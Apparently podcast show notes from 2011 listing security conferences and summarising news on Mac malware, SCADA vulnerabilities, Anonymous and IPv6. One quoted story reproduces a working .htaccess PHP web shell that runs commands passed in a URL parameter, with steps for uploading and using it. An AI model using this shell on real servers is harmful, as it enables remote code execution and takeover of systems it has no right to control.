Announcements:
LayerOne 2011
When: Saturday May 28th – Sunday May 29th
Where: Los Angeles, CA
http://www.layerone.org/

My Hard Drive Died
5-Day Data Recovery Expert Certification
Where: Atlanta, Georgia
When: June 6-10, 2011

5-Day Bootcamp Data Recovery
Where: Chicago, Illinois
When: July 18-22, 2011

#BSidesPGH
Where: 116 Federal St., Sunny Pittsburgh, PA.

When: June 10, 2011
http://www.securitybsides.com/w/page/38914998/BSidesPittsburgh

#BSidesCT
Where: Meriden, Connecticut

When: June 11, 2011
http://bsidesct.eventbrite.com

eXcon
Where: Meriden, Connecticut
When: June 11-12, 2011
http://excon.eventbrite.com  (email excon@nesit.net for more info)
Begins after BSidesCT Registration cost is $50.00

#BSidesVienna
When: June 18, 2011
Where: Vienna, Austria
http://www.bsidesvienna.com
CFP now closed!

2nd Annual AIDE conference
When: July 11th – 15th, 2011
Where: Marshall University Forensic Science Center, Huntington, WV
http://aide.marshall.edu/

OISF July Anniversary Event
When: July 16th, 2011
Where: Dayton, Ohio
http://ohioinfosec.org
Adrian Will be there

#BruCon
When: Sept 19-22, 2011
Where: Brussels, Belgium
http://blog.brucon.org/2011/02/confirmation-of-brucon-dates.html
CFP Closed!

@DerbyCon
When: September 30th – October 2, 2011
Where: Louisville, KY
http://www.derbycon.com/

2011 Fall Information Security Conference
When:  November 8 – 9, 2011
Where: Atlanta, GA (Loudermilk Conference Center)

http://www.gaissa.org
CFP open now through June 3, 2011! Email submissions to Conference@gaissa.org

EFF:

The ISD Podcast has entered entered into a contest to see who can raise the most money for the Electronic Frontier Foundation.  For those who don’t know, the EFF is a non-profit group of lawyers, policy analysts, activists, and technologists who fight for digital rights and have helped countless hackers and security researchers get out of hot water as well as exposing injustices caused by ignorant legislation and bad judgements.  Please click the following link to donate to a vitally important cause:
http://action.eff.org/site/TR/Contest/Advocacy?team_id=1730&pg=team&fr_id=1060

Stories
Source: Coming Soon!

Another Ligatt?  We have a huge Ligatt style story that is just developing.  We expect to have more news on this as it develops, but we certainly want you to know that some folks never sleep and they will find those folks that are out there.

Source: http://www.theregister.co.uk/2011/05/20/apple_malware_attacks/

Apple officials have instructed members of the company's support team to withhold any confirmation that a customer's Mac has been infected with malware or to assist in removing malicious programs, ZDNet's Ed Bott reported on Thursday.

He cited an internal document titled "About 'Mac Defender' Malware," which was last updated on May 16 and says that the trojan, which surfaced earlier this month and masquerades as legitimate security software for the OS X platform, is an "Issue/Investigation In Progress."

"AppleCare does not provide support for removal of the malware," the document, which was labeled confidential, stated. "You should not confirm or deny whether the customer's Mac is infected or not."

The memo's disclosure comes as the number of reported Mac attacks has skyrocketed, Bott said. According to an earlier article he published, he recently found more than 200 separate discussion threads on discussions.apple.com in which users complained of infections that caused their Macs to behave erratically.

"Porn sites just started popping up on my MacBook Pro," one user wrote. "Is this a virus? I have never had a virus on a Mac before and I have been using Macs for years. Please help!"

The con artists behind Mac Defender hook their victims by presenting Mac-using web surfers with images that depict an antivirus scan taking place on their machines. The images falsely claim users are infected with serious malware and urge them to download and install the antivirus package. Those who fall for the ruse are then infected. Similar scams have plagued Windows users for years, often to the delight and scorn of Mac and Linux fans.

According to a third article penned by Bott, AppleCare reps are seeing a four- to five-fold increase in the number of calls requesting support for rogue antivirus scams targeting the Mac.

Source: http://crashdex.com/2011/05/73-of-organizations-hacked-in-the-last-2-years/

Website attacks are the biggest concern for companies, yet 88 percent spend more on coffee than securing Web applications, according to a survey by Barracuda Networks, Cenzic and the Ponemon Institute.

According to 74 percent of respondents, Web application security is either more critical or equally critical to other security issues faced by their organizations. Despite this, the study shows there are many misconceptions around the methods used to secure Web applications, primarily Web application firewalls and vulnerability assessment.

“While it is encouraging to see that Web application security is on the minds of most organizations, there still seems to be a real disconnect between the desire and implementation of security countermeasures required for Web application security,” said Dr. Paul Judge, chief research officer and VP for Barracuda Networks.

“The fact that 69 percent of respondents are relying upon network firewalls to secure Web applications is like relying upon a cardboard shield for protection in a sword fight – eventually your shield will prove that it’s insufficient and an attack will reach you that can fly past a network firewall,” he added.

“The fact that a quarter of respondents could not provide a range for how many Web applications they have is a huge red flag right off the bat,” said Mandeep Khera, CMO for Cenzic. “Furthermore, that 20 percent of organizations do not test at all and 40 percent test only 5 percent of their Web applications is shocking. And, most of these companies have been hacked multiple times through insecure Web applications. If you know that burglars come through a broken door repeatedly wouldn’t you want to fix that door?”

Other key findings in the study include:

• Data protection (62 percent) and compliance (51 percent) were the top reasons for securing Web apps. Job protection was also a significant reason cited by 15 percent of respondents.
• Despite 51 percent listing compliance as a key driver for Web application security, 43 percent are not familiar with or have no knowledge of OWASP, a key component to compliance standards like PCI.
• With 41 percent reporting they have over 100 Web applications or more, the majority (66 percent) test less than 25 percent of these applications for vulnerabilities.
• More than half (53 percent) expect their Web hosting provider to secure their Web applications.
• Of those respondents who own a Web application firewall, nearly 2 times agreed that a reverse proxy is a better and more secure technology than a transparent bridge technology.

“While IT practitioners recognize the criticality of secure Web applications, their organizations do not provide adequate resources and expertise to manage the risk,” said Dr. Larry Ponemon, chairman and founder, Ponemon Institute. “Over half of the respondents we polled believe they do not have resources to detect and remediate insecure Web applications, and 64 percent said they believe that their organization have inadequate governance and usage policies.

Source: http://bink.nu/news/microsoft-web-application-configuration-analyzer-v2-0.aspx

Web Application Configuration Analyzer (WACA) analyzes server configuration for security best practices related to General Windows, IIS , ASP.NET and SQL Server settings.

Web Application Configuration Analyzer (WACA) is a tool that scans a server against a set of best practices recommended for pre-production and production servers. It can be used by developers to ensure that their codebase works within a secure / hardened environment (although many of the checks are not as applicable for developers). The list of best practices is derived from the Microsoft Information Security & Risk Management Deployment Review Standards used internally at Microsoft to harden production and pre-production environments for line of business applications. The Deployment Review standards themselves were derived from content released by Microsoft Patterns & Practices, in particular: Improving Web Application Security: Threats and Countermeasures available at: http://msdn.microsoft.com/en-us/library/ms994921.aspx. It uses an agent-less scan that requires the user to have admin privileges on the target server, as well as any SQL Server instances running on that machine.

This release of WACA we included some new features. They include:

• Suppressions – you can now suppress any rule you feel is not appropriate for your scan.
• Saving of suppression files – once you set up a suppression list you want to use you can save it off for future uses.
• You can change the suppressions and regenerate the report without needing to re-run the scan.
• Reporting – Updated the reporting section to include suppression information so you know what passed, failed, was not applicable and what was suppressed.
• Multiple reports – you can view multiple scans of the same machine or view a single machine’s scan and compare it to other machines.
• Export to the Microsoft RED format.
• Scan multiple systems and SQL instances in one bulk scan.
• Additional rules – we’ve added in additional SQL rules.
• And of course bug fixes that were missed in the last release.

Click here to download WACA

Source: http://searchsecurity.techtarget.com/news/2240035990/IPv6-connectivity-Innovations-address-IPv6-security-concerns

Internet Protocol version 6 (IPv6) is coming soon to an enterprise near you, but few organizations have invested much time or effort into understanding how it works, never mind how to secure it. Yet enterprises could stand to learn something from the students and staff at Virginia Tech, which was recently lauded for an innovative new technology that secures IPv6 network communications.

A team from the Blacksburg, Va.-based university’s Information Technology Security Laboratory was recognized by the National Homeland Defense Foundation, which is a nonprofit forum for responding to terrorism tactics and natural disasters, for creating a security tool called Moving Target IPv6 Defense (MT6D).

MT6D solves one of a number of unique IPv6 security concerns that don’t exist in IPv4. In short, an IPv6 address consists of two parts: a 64-bit network prefix, and a 64-bit host address. The first part is determined by the network, but the host address by default is determined by the device’s MAC address.

According to Stephen Groat, a Ph. D. student in computer engineering at Virginia Tech, in this scenario, a machine’s IPv6 address would expose its MAC address, making a machine easy to track by a potential attacker.

“In IPv6, it takes centuries to scan a single subnet,” Groat said. “But once an attacker knows that MAC address, this lets an attacker pretty much do anything they want to a system.”
Groat said, with a little homework, attackers could use the IPv6 address to learn who the manufacturer of the system is, and also collect traffic over multiple sessions: Even when a device disconnects and reconnects, the MAC address portion of the IPv6 address remains unchanged.

There are mechanisms that exist today to obfuscate IPv6 client addresses to some degree, like IPv6 privacy extensions in Windows 7, but Groat said the Virginia Tech team wanted to protect both ends of a session; privacy extensions may protect clients, but servers can’t change their addresses without terminating a session.

That’s where MT6D comes in. It serves to create an algorithm that allows a pair of network hosts to change their addresses dynamically in a way that each host can predict the other’s next address, creating a network tunnel. The technology could be deployed as a stand-alone appliance on a network to secure a subnet or be built into specialized network devices like smart grid electric meters, but it’s likely to be made available to vendors for inclusion in commercial networking and security products.

While MT6D solves one IPv6 security problem, there are still a number of others. Few network security products today offer robust support for IPv6, Groat said, and those that claim to often haven’t been tested in a large-scale IPv6 environment like the Virginia Tech network, which has been in place since 2005 and features 30,000 nodes. Often, organizations have IPv6-enabled devices and don’t realize it, opening the door for malware to use IPv6 as an unmonitored back-channel. And that’s just for starters.

“We have someone here who also works for a hosting firm, and at the hosting firm they can’t turn on v6 support for their mail servers because they have v4-only blacklists,” Groat said. “So if they turn on v6, they’ll suddenly get all this spam. The other question is, ‘How do you create a blacklist for v6?’ Since hosts can change their addresses so frequently, do you block whole subnets? These are real problems people haven’t solved yet.”

Fortunately, with World IPv6 Day coming on June 8 – a one-day IPv6 connectivity awareness initiative where many global network and website operators like Google and Facebook will turn on IPv6, just to see what happens — everyone will get a chance to see what an IPv6 Internet looks like. Though some believe the event will mostly be a PR stunt and simply raise awareness for the upcoming transition across the Internet, count the Virginia Tech team among those who believe it could be a disruptive event.

“I think a lot of websites will break,” said William Urbanski, a security analyst with the Virginia Tech IT security office. “I think end users are going to see misconfigurations on commerical ISPs.”

Still, World IPv6 day and the MT6D tool should serve to help enterprise security teams ponder how their security tactics must evolve as IPv6 takes hold.

Source:   http://www.newsinenglish.no/2011/05/19/military-fends-off-major-cyber-attack/

Norwegian military personnel were the targets of what’s being described as a "massive" cyber attack this spring, one day after Norway started bombing Libya with other UN- and NATO-backed forces. Newspaper VG reported Thursday that they fended off the attack, which was considered the most serious ever experienced.

It came in the form of an e-mail written in what was said to be "good Norwegian" that looked like it had been sent by another Norwegian government agency. It contained an attachment, however, that when opened unleashed a computer virus that could have opened up military PCs to the attackers.

Several hundred defense ministry employees received the same e-mail, reported VG. One employee opened the attachment, allowing the unknown attackers to gain access to that employee’s PC, but the virus was then quickly discovered and warnings issued.

The attackers didn’t succeed with further infiltration, claimed Major General Roar Sundseth, adding that they also failed to obtain classified information before the attack was discovered.

Source:  http://english.donga.com/srv/service.php3?bicode=060000&biid=2011051977548

North Korea has as many as 30,000 electronic warfare specialists as part of the elite core of the North`s military, Fox News said Tuesday.

Quoting U.S. and South Korean intelligence, the U.S. network said Washington and Seoul believe that the U.S. CIA can match Pyongyang`s capability in cyber warfare.

Fox quoted North Korean leader Kim Jong Il as telling his military several years ago, “Modern war is electronic warfare. Victory or defeat in a modern war depends on how to carry out electronic warfare.” He has since made cyber warfare a top albeit secret priority of his paranoid regime, it added.

Among the most frequent visitors to U.S. military websites are computers traced to North Korea, according to the U.S. Defense Department. Much like the clandestine nuclear program run by the rogue state, its cyber warfare capability is shrouded in secrecy.

Source:  http://heavemedia.com/2011/05/20/the-rapture-2011/

May 21st begins “The Rapture of 2011”. This is the day that Jesus Christ will come back to earth (but probably not Kentucky) and resurrect the dead bodies of true “saved” Christians while simultaneously lifting still living Christians into the air, while plaguing the rest of us with earthquakes, floods, and locusts that will sting the shit out of us…FOR 5 FUCKING MONTHS!  There will be a rapture party, clothing optional, at the Hard Rock in Las Vegas at 6 pm local time for those that are interested.  

With all this talk of Rapture, it amazes me that there hasn’t been any malware.  Then occurred to me that the event or notion of the even is malware enough and perhaps those hedonistic developers thought that maybe we needed a break.  Maybe not, but only time will tell.

My Hard Drive Died
5-Day Data Recovery Expert Certification
Where: Atlanta, Georgia
When: June 6-10, 2011

5-Day Bootcamp Data Recovery
Where: Chicago, Illinois
When: July 18-22, 2011

#BSidesCT
Where: Meriden, Connecticut
When: June 11, 2011
http://bsidesct.eventbrite.com

eXcon
Where: Meriden, Connecticut
When: June 11-12, 2011
http://excon.eventbrite.com  (email excon@nesit.net for more info)
Begins after BSidesCT Registration cost is $50.00

#BSidesVienna
When: June 18, 2011
Where: Vienna, Austria
http://www.bsidesvienna.com
CFP now closed!

2nd Annual AIDE conference
When: July 11th – 15th, 2011
Where: Marshall University Forensic Science Center, Huntington, WV
http://aide.marshall.edu/

OISF July Anniversary Event
When: July 16th, 2011
Where: Dayton, Ohio
http://ohioinfosec.org
Adrian Will be there

#BruCon
When: Sept 19-22, 2011
Where: Brussels, Belgium
http://blog.brucon.org/2011/02/confirmation-of-brucon-dates.html
CFP Closed!

@DerbyCon
When: September 30th – October 2, 2011
Where: Louisville, KY
http://www.derbycon.com/

2011 Fall Information Security Conference
When:  November 8 – 9, 2011
Where: Atlanta, GA (Loudermilk Conference Center)
http://www.gaissa.org
CFP open now through June 3, 2011! Email submissions to Conference@gaissa.org

EFF:
The ISD Podcast has entered entered into a contest to see who can raise the most money for the Electronic Frontier Foundation.  For those who don’t know, the EFF is a non-profit group of lawyers, policy analysts, activists, and technologists who fight for digital rights and have helped countless hackers and security researchers get out of hot water as well as exposing injustices caused by ignorant legislation and bad judgements.  Please click the following link to donate to a vitally important cause:
http://action.eff.org/site/TR/Contest/Advocacy?team_id=1730&pg=team&fr_id=1060

Stories

Source:http://threatpost.com/en_us/blogs/barrett-brown-public-face-anonymous-leaves-group-051611

Barrett Brown, the reporter who became a media-friendly spokesperson for the shadowy hacking group Anonymous says that he is quitting the group in the wake of a public feud that has broken out between different hacker factions within the loosely organized collective.

Brown told Threatpost that he and around two dozen Anonymous members are forming a splinter group to focus on efforts to root out what Brown has described as "criminality and corruption" within the U.S. Government, U.S. military, corporations and the media.

Brown, a journalist and author, has been the public face and chief apologist from the anarchic and leaderless group during recent controversies, including the hack of security firm HBGary. He said recent feuds between different Anonymous factions, culminating in the recent takeover of two IRC chat servers used by the group convinced him that the group had lost its way.

"I'm tired of the drama," Brown told Threatpost in a phone interview May 10. "You've got kids fighting for control of an IRC channel. I'm a researcher. I'm into revolutionary stuff. But there are other people for whom its about exerting power," he said.

Brown told Threatpost he is defecting with what he claims are around two dozen Anonymous members. He said he planned to focus on Project PM – an effort to create an umbrella group that will support other organizations that want to expose pro-government and pro-corporate bias in the media.

The parting of ways between Brown and the allegedly "leaderless" group comes at a perilous time. Recent months have seen defectors from the group publish potentially damaging information that could be used to identify active members. In March, a splinter group calling itself Backtrace Security published a document that claimed to identify or partially identify 80 members of Anonymous's leadership. The group launched OpSony in April to retaliate against Sony's legal pursuit of hackers, like George Hotz, who had circumvented security features of PlayStation devices. A massive compromise of Sony's PlayStation Network followed, which Anonymous has steadfastly denied responsibility for. Then, in May, a feud erupted between high-level members of Anonymous that led to the hostile takeover of two Web domains used by the group to host IRC (Internet Relay Chat). Subsequent to the takeover, an Anonymous administrator known as "Ryan" spilled information online that could, potentially, be used to link participants in Anonymous online chats with individuals in the real world. Anonymous members have since been forced to shift their activities to IRC forums not hosted on Anonops.ru and Anonops.net, both of which were taken over by "Ryan."

Brown's relations with Anonymous's membership was testy at times. Within the last year, he had transitioned from a journalist covering Anonymous's activities for publications like The Huffington Post to an informal spokesman for the group: giving interviews with the press and writing press releases. His frequent mentions in the press, where he was occasionally identified as Anonymous's spokesman, drew the ire of other Anonymous members whyo accused him variously of hogging the spotlight and drawing unwanted attention to the group. Brown, himself, disavowed any leadership role in the group, which he maintained was leaderless. However others, notably Aaron Barr of HBGary, have contested the idea that the group lacks a hierarchy and established leadership.

Anonymous observers, who asked to remain anonymous themselves, said there's reason to believe that Brown is being cut off by core Anonymous members worried about having their identities exposed, or wary of Brown's focus on government wrongdoing. Sources say that ongoing criminal investigations of Anonymous's previous actions may soon produce indictments and that more than one longtime member has "gone dark" in recent weeks, especially after the group was mentioned as a possible source of the PlayStation Network breach.

Geordy’s comment: Wonder what his severance package is like…
Adrian’s comment: Comments here sum it up: http://anonnews.org/?p=comments&c=ext&i=1700

Source: http://www.wired.com/threatlevel/2011/05/siemens-scada-vulnerabilities/

A security researcher has discovered multiple security vulnerabilities in Siemens industrial control systems that he says would allow hackers with remote access to the systems to cause physical destruction.

Dillon Beresford canceled a planned demonstration of the vulnerabilities on Wednesday at the Takedown security conference in Texas after Siemens and the Department of Homeland Security expressed concern over the phone and at the conference about disclosing information before Siemens could patch the vulnerabilities.

Beresford, a researcher who works for NSS Labs in Austin, Texas, says he decided to cancel the talk — “Chain Reactions–Hacking SCADA” — after realizing the full ramifications of the information he planned to reveal.

“Based on my own understanding of the seriousness behind this, I decided to refrain from disclosing any information due to safety concerns for the consumers that are affected by the vulnerabilities,” Beresford told Threat Level, adding that “DHS in no way tried to censor the presentation.”

The vulnerabilities affect the programmable logic controllers in several Siemens SCADA systems. Siemens PLC products are used in companies throughout the U.S. and the world controlling everything from critical infrastructure systems such as nuclear power and enrichment plants to commercial manufacturing facilities. It was a vulnerability in a PLC belonging to Siemens’ Step7 control system that was the target of the sophisticated Stuxnet worm. Stuxnet was discovered on systems in Iran last year and is believed to have been designed by a nation state aimed at destroying uranium enrichment centrifuges at the Natanz nuclear facility in Iran.

Beresford began researching SCADA systems independently at home about two and a half months ago. He purchased SCADA products online with funding from his employer and planned to examine systems belonging to multiple vendors. Beresford began with Siemens and found multiple vulnerabilities in the products very quickly.

“They’re very easy to exploit,” Beresford said. “As long as you have access to [a PLC's] network you will be able to exploit.”

Beresford wouldn’t say how many vulnerabilities he found in the Siemens products but said he gave the company four exploit modules to test. He believes that at least one of the vulnerabilities he found affects multiple SCADA system vendors, which share “commonality” in their products. Beresford wouldn’t reveal more details but says he hopes to do so once Siemens releases a statement, which he says the company is preparing for Thursday.

Siemens did not immediately respond to a call for comment from Threat Level.

Beresford contacted ICS-CERT to disclose the vulnerabilities. ICS-CERT (Industrial Control Systems Cyber Emergency Response Team) is a computer security group that the Department of Homeland Security operates in partnership with Idaho National Laboratory. The group researches vulnerabilities in industrial control systems and helps alert vendors and customers about security holes in products.

Beresford gave ICS-CERT exploits for the vulnerabilities, which the lab was able to confirm worked.

“They just said it was far-reaching and more serious than anything they’ve ever dealt with,” Beresford said.

A DHS official, who asked not to be identified, said only that ICS-CERT frequently engages with vendors and members of the cybersecurity community to share vulnerability information and mitigation measures and that “responsible disclosure process does not encourage the release of sensitive vulnerability information without also validating and releasing a solution.”

ICS-CERT contacted Siemens, based in Germany, and the company began to work on patches for the vulnerabilities. Both Siemens and ICS-CERT had been fine with Beresford’s initial decision to talk about the vulnerabilities at the conference but changed their mind once they saw his presentation.

Siemens was still working on patches but had found a remediation for one of the vulnerabilities. But Beresford found he was easily able to get around it.

“It’s a recommendation which is in their defense in-depth model,” Beresford says. “There’s a button in their product that says ‘protect me more.’ . . . It’s the only security feature they have in their product to protect it and it’s flawed.”

Once Siemens saw in his presentation that their mitigation didn’t work, the company realized it had to go back to the lab and reassess how to address the vulnerability, Beresford said.
The decision to pull the talk at the last minute caused rumors to fly at the conference. Another presenter at Takedown tweeted that DHS had banned Beresford’s talk.

But Beresford disputed this and said he’s been “extremely impressed” with the way ICS-CERT has handled the matter.

“This is different from simply stealing money out of someone’s bank account,” said NSS Labs CEO Rick Moy. “Things could explode. I don’t want to overplay this and sound like it’s a bunch of FUDbut physical damage can occur and people can be seriously injured or worse. So we felt … it was best to be prudent and wait a little bit longer until we get more information.”

Source:http://www.theregister.co.uk/2011/05/18/google_android_security_fix/

Google has plugged a security hole that exposed the vast majority of Android phone users' calendars and contacts when they accessed those services over unsecured networks.

"Today we're starting to roll out a fix which addresses a potential security flaw that could, under certain circumstances, allow a third party access to data available in calendar and contacts," a company spokesman wrote in an email. "This fix requires no action from users and will roll out globally over the next few days."

The server-side fix addresses an implementation error in earlier versions of Android, which is used by more than 99 percent of those using the mobile operating system, according to Google figures. Versions 2.3.3 and earlier failed to transmit authentication tokens over an encrypted channels.

Attackers monitoring Wi-Fi hotspots and other open networks could exploit the weakness by copying the so-called authTokens and using them to gain unauthorized access to users' Google Calendars and Contacts.

The vulnerability could also cause devices synchronizing with Google Picasa web albums to transmit sensitive data through unencrypted channels, academic researchers from Germany's University of Ulm said.

The Google spokesman said the company's security team is still investigating those claims.
The fix forces Google servers to use an encrypted https connection when phones sync with Calendar and Contacts.

Source: http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html

A while back I was testing a CMS that had a curious feature, all uploaded files were placed in their own directory. This was not a security enhancement as the application allowed php files to be uploaded. However I coudn't help ask, what if php uploads had been restricted? The answer was .htaccess files. Using SetHandler in a .htaccess file is well known, but does not lead to remote code execution. So after some thinking I put together some self contained .htaccess web shells. I wrote both a php and a server side include shells, but other options can easily be added (jsp, mod_perl, etc).

This works by first diverting the default apache .htaccess access restriction from within the .htaccess file so we can access it as a url. Next we reconfigure the .htaccess extension to be treated as a dynamic content script and finally we have our payload. The attack works because the .htaccess parsing and processing for apache configuration directives occur before the .htaccess file is processed as a web request. There is a relatively small gotcha, the payload has to be commented out with a # at the start so it doesn't get interpreted by apache and likewise, the script interpreter must ignore the apache directives. PHP lends itself well to this as any content not within the <?php ?> tags are presented as is.

# Self contained .htacces web shell – Part of the htshell project
# Written by Wireghoul – http://www.justanotherhacker.com

# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>

# Make .htaccess file be interpreted as php file. This occur after apache has interpreted
# the apache directoves from the .htaccess file
AddType application/x-httpd-php .htaccess

###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######

Simply upload the preferred shell as a .htaccess file and then visit the .htaccess file via the url http://domain/path/.htaccess?c=command for remote code execution. The collection of attack files are collectively accessible from my githubhtshells repository.

Source:  http://www.cmio.net/index.php?option=com_articles&view=article&id=27819

The U.S. Department of Health & Human Services (HHS) Office of Inspector General (OIG) has released two reports released two reports that question HHS agencies' efforts to secure electronic protected health information.

An OIG audit cited the Office of the National Coordinator for Health IT (ONC) for its lackluster efforts in ensuring that patients' individually identifiable health information is secure and adequately protected for nationwide implementation of interoperable health IT. A second report
criticized the Centers for Medicare & Medicaid Services (CMS) lax enforcement of the HIPAA security rule prior to June 2009.

The CMS report

To determine the sufficiency of CMS’s oversight and enforcement actions pertaining to hospitals’ implementation of the HIPAA Security Rule, OIG conducted audits at seven covered hospitals around the country and found that CMS’ oversight and enforcement actions were not sufficient to ensure that covered entities, such as hospitals, effectively implemented the security rule, according to the report.

“As a result, CMS had limited assurance that controls were in place and operating as intended to protect electronic personal health information, thereby leaving electronic personal health information vulnerable to attack and compromise,” the reported stated.

Source:  http://www.telegraph.co.uk/news/worldnews/middleeast/israel/8514919/Mossad-carries-out-daring-London-raid-on-Syrian-official.html

The original plan was apparently to assassinate the official and Israel  only averted what would have been a huge diplomatic rift with Britain,  when they decided the target was more valuable alive than dead.

The operation involved at least 10 undercover agents on the streets of Britain and led directly to a controversial bombing raid into Syrian territory that destroyed a nuclear reactor that was under construction.

It closely mirrored the assassination of Mahmoud al-Mabhouh, a senior Hamas arms trader, who was killed in his hotel room in Dubai last year using agents disguised as tennis players.

The operation began when Israeli intelligence picked up an online booking for a senior Syrian nuclear official at a hotel in Kensington, west London, in late 2006, according to the Israeli authors of the book Israel vs Iran: the Shadow War.

Mossad then dispatched three undercover teams to Britain including a team of "spotters" who were sent to Heathrow airport to identify the official as he flew in from Damascus under a false name. A second team booked into his hotel, while a third monitored his movements and any visitors.

LayerOne 2011
When: Saturday May 28th – Sunday May 29th
Where: Los Angeles, CA
http://www.layerone.org/

My Hard Drive Died
5-Day Data Recovery Expert Certification
Where: Atlanta, Georgia
When: June 6-10, 2011

5-Day Bootcamp Data Recovery
Where: Chicago, Illinois
When: July 18-22, 2011

#BSidesCT
Where: Meriden, Connecticut
When: June 11, 2011
http://bsidesct.eventbrite.com

eXcon
Where: Meriden, Connecticut
When: June 11-12, 2011
http://excon.eventbrite.com  (email excon@nesit.net for more info)
Begins after BSidesCT Registration cost is $50.00

#BSidesVienna
When: June 18, 2011
Where: Vienna, Austria
http://www.bsidesvienna.com
CFP now closed!

2nd Annual AIDE conference
When: July 11th – 15th, 2011
Where: Marshall University Forensic Science Center, Huntington, WV
http://aide.marshall.edu/

OISF July Anniversary Event
When: July 16th, 2011
Where: Dayton, Ohio
http://ohioinfosec.org
Adrian Will be there

#BruCon
When: Sept 19-22, 2011
Where: Brussels, Belgium
http://blog.brucon.org/2011/02/confirmation-of-brucon-dates.html
CFP Closed!

@DerbyCon
When: September 30th – October 2, 2011
Where: Louisville, KY
http://www.derbycon.com/

2011 Fall Information Security Conference
When:  November 8 – 9, 2011
Where: Atlanta, GA (Loudermilk Conference Center)
http://www.gaissa.org
CFP open now through June 3, 2011! Email submissions to Conference@gaissa.org

EFF:
The ISD Podcast has entered entered into a contest to see who can raise the most money for the Electronic Frontier Foundation.  For those who don’t know, the EFF is a non-profit group of lawyers, policy analysts, activists, and technologists who fight for digital rights and have helped countless hackers and security researchers get out of hot water as well as exposing injustices caused by ignorant legislation and bad judgements.  Please click the following link to donate to a vitally important cause:
http://action.eff.org/site/TR/Contest/Advocacy?team_id=1730&pg=team&fr_id=1060

Special Guest:  Will Genovese talks to us about eXcon.

eXcon aims to be a cutting edge security conference presented by Ex-Military, Ex-Secret Service, Ex-CIA, Ex-Cons, along with some of the brightest and most recognizable pen testers, programmers, and systems experts. Tracks will include demos of social engineering, digital tracking, exploit development and implementation, and war stories. eXcon will feature a lockpicking & hackerspace village (email excon@nesit.net for more info)

More Info http://exconference.com

Stories
Source:
http://www.thestar.com/news/article/993296–g20-accused-byron-sonne-finally-released-on-bail

The last person remaining jailed on charges related to last summer’s G20 summit was released on bail Wednesday after spending 330 days in detention.

Byron Sonne, a 38-year-old Internet security expert with no criminal record, is charged with possessing explosive substances and counselling the commission of mischief not committed, for his alleged activities leading up to last summer’s G20 summit.

He was ordered released on a $250,000 bail bond and a number of stringent conditions.
After he was released from court Sonne said the first thing he was going to do is get a double-tall whole milk latte from Starbucks “and then hug my Mom and Dad a few more times.”
He at first resisted discussing his case, but later agreed with a suggestion that the Crown had made an example out of him by keeping him in custody for nearly 11 months.

“I never had any plans to hurt anybody at all – ever,” he said, adding that he is looking forward to trial. “I'm sure I'll be exonerated and everything will turn out for the best.”

Sonne refused to directly discuss his relationship with his ex-wife, who filed for separation while he was in jail and has cut off all ties with him and his family, but he said he had “suffered the loss of people very close to me, that I wish I could be with.”

Sonne also thanked his supporters “from all over the world,” but especially the Toronto-based supporters from Hacklab.TO.

Sonne’s parents, Bue and Valerie, who are both retired, posted bail for their son and will act as sureties.

He must live at their Brampton home and can only leave the residence if accompanied by either his father or mother, except to attend work, school, court or for medical emergencies.
Sonne must also have no contact with his ex-wife, Kristen Peterson, and must remain 500 metres from their matrimonial home in Forest Hill. There are no allegations of domestic disputes or violence of any kind between the couple.

He must also have no contact with anyone accused with G20 conspiracy crimes or anyone associated with a number of anarchist groups or the Toronto Community Mobilization Network. There are no allegations that Sonne has ever associated with those people or groups.
Sonne is barred from accessing the Internet, except for employment purposes, but Justice Ian MacDonnell consented to allowing Sonne to purchase a new laptop, which will be inspected by police, that he will be able to use for employment purposes only and only while in his parents’ house.

He is allowed to access email only for work, and he is not allowed to delete any emails or Internet history. Police will be allowed to inspect computer at any time.
He is also barred from using any wireless telecommunications.

Police will also be allowed to search Sonne’s parents’ home once a week, without a search warrant.

The 361 University Ave. courthouse where he appeared was packed with media and supporters. Arguments made at the bail hearing are under a publication ban.

Sonne arrived late to the proceedings from the Maplehurst jail in Milton. Wearing a red fleece zip-up sweater and blue jeans, he smiled throughout the proceedings and acknowledged several people in the court.

He was arrested on June 22, 2010 — two days before the summit began — at the $1 million Forest Hill home he then shared with Peterson.

Peterson was arrested two days after her husband, but had all her charges dropped earlier this year. She filed for legal separation a few months after the arrest and has cut off all contact with Sonne and his family.

Police allege Sonne planned to detonate a homemade explosive in downtown Toronto to disrupt the meeting of world leaders, and had used social media to encourage people to interfere with the security apparatus.

Sonne’s supporters say their friend is non-violent but fiercely critical of state surveillance and restrictions on civil liberties. They say Sonne may have been baiting security officials to intentionally trigger an overreaction by police.

Sonne had posted photos to his Twitter feed of the security fence that surrounded the summit site and of the various surveillance cameras set up downtown. He also took photos of police, which he posted with unflattering captions such as “Bacon on wheels” and “Stationary bacon.”
Evidence heard during bail hearings and during the judicial pre-trial is under publication ban.
Sonne’s supporters — many from Toronto’s hacker community — rallied long and hard for his release. They set up a“Free Byron” website and talked about Sonne’s case at international technology conferences, garnering support from as far away as France and Germany. They accuse police of heavy-handedness and of stifling political dissent.

Upon his arrest, Sonne was also charged with possessing weapons, mischief, attempted mischief, and two counts of intimidating justice officials, but those charges were all dropped at judicial pre-trial, leaving only the explosives offence. The counselling mischief not committed charge was added at that time.

MacDonnell awarded bail earlier this week after defence lawyer Joseph Di Luca argued that the case against his client had changed substantially following judicial pre-trial. He had been denied bail twice before.

Sonne’s trial is now scheduled to begin Nov. 7.

Geordy’s comment: Canada’s penal system certainly seems uneven at best.  Seems like Bryon got to take the fall for all of the Canadian government’s pent up rage.

Source: http://mashable.com/2011/05/16/turkey-protests-internet-censorship/

Disgruntled Turkish Internet users marched through the streets in more than 30 cities on Sunday to protest a new Internet filter system that they consider censorship.

The system will ask all users to choose from a selection of filters, including “family,” “children” and “domestic,” before browsing the Internet in Turkey. It is planned to take effect in August.
Earlier this month, the Information and Communication Technologies Authority (BTK) President Tayfun Acarer told reporters that the organization had introduced the filters in response to requests for better Internet safety. Currently available filters for families and children don’t work that well, he said, and the new system includes a “standard” filter option for those who don’t want their Internet browsing experience to change.

Thousands of Turkish people who used Facebook to organize and attend marches on Sunday see the measure differently.

“You’d enter a channel leading you to the server of the state, which distributes the Internet to millions of users. The system enables the control of citizens … like telephone tapping,” one of the protestors, Serkan Dogan, told The Wall Street Journal.

